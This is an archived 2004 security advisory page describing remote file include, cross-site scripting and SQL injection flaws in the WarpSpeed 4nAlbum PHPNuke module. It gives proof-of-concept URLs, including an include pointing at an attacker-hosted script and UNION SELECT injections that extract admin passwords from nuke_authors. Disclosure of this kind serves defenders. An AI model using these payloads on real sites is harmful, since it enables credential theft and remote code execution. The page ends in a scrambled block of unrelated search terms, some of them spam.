exploits , vulnerabilities , articles , WarpSpeed 4nAlbum Module For PHPNuke Multiple Vulnerabilities

Title	WarpSpeed 4nAlbum Module For PHPNuke Multiple Vulnerabilities
Published	2004-03-15-12:00AM
Updated	2004-03-15-10:12PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Disclosure of these issues is credited to Janek Vind <come2waraxe@yahoo.com>.
Vulnerable	WarpSpeed 4nAlbum Module 0.92
Not Vulnerable
Code	The following proof of concept was provided: To leverage the remote file include: http://www.example.com/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http://www.example.net/ Where the attacker would have to have malicious code in the script 'http://www.example.net/public/imageFunctions.php' To leverage the cross-site scripting issue: http://www.example.com/phpNukeDirectory/modules/4nalbum/public/nmimage.php?z=[xss code here] To leverage the SQL injection issue: http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/* http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:57:38 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
bbs.xtklyy www.bollys mambo Remo icewarp we nacid.com php 4.3.3 news for c 4.10 AISHWARYA news for c kasper sky mambo Remo Cyrus IMAP Tormozdast motorola L 200 /compo L+F0`P9TT6 rs gallery ww.indin.s www.bangla xp bypass 200 /compo www.bangla www.gupiao free ponog microsoft. newspro expoitedmo vbulletin www.trish Searching php-nuke 2 freebesede www.besiba www.seks.k Apache ht local root maxcpm.inf Sexy young www.oldfre Guild FtP nude sania www.606688 news for c sex12 iranboycli php-nuke 2 pop3 brute sex vido maria elen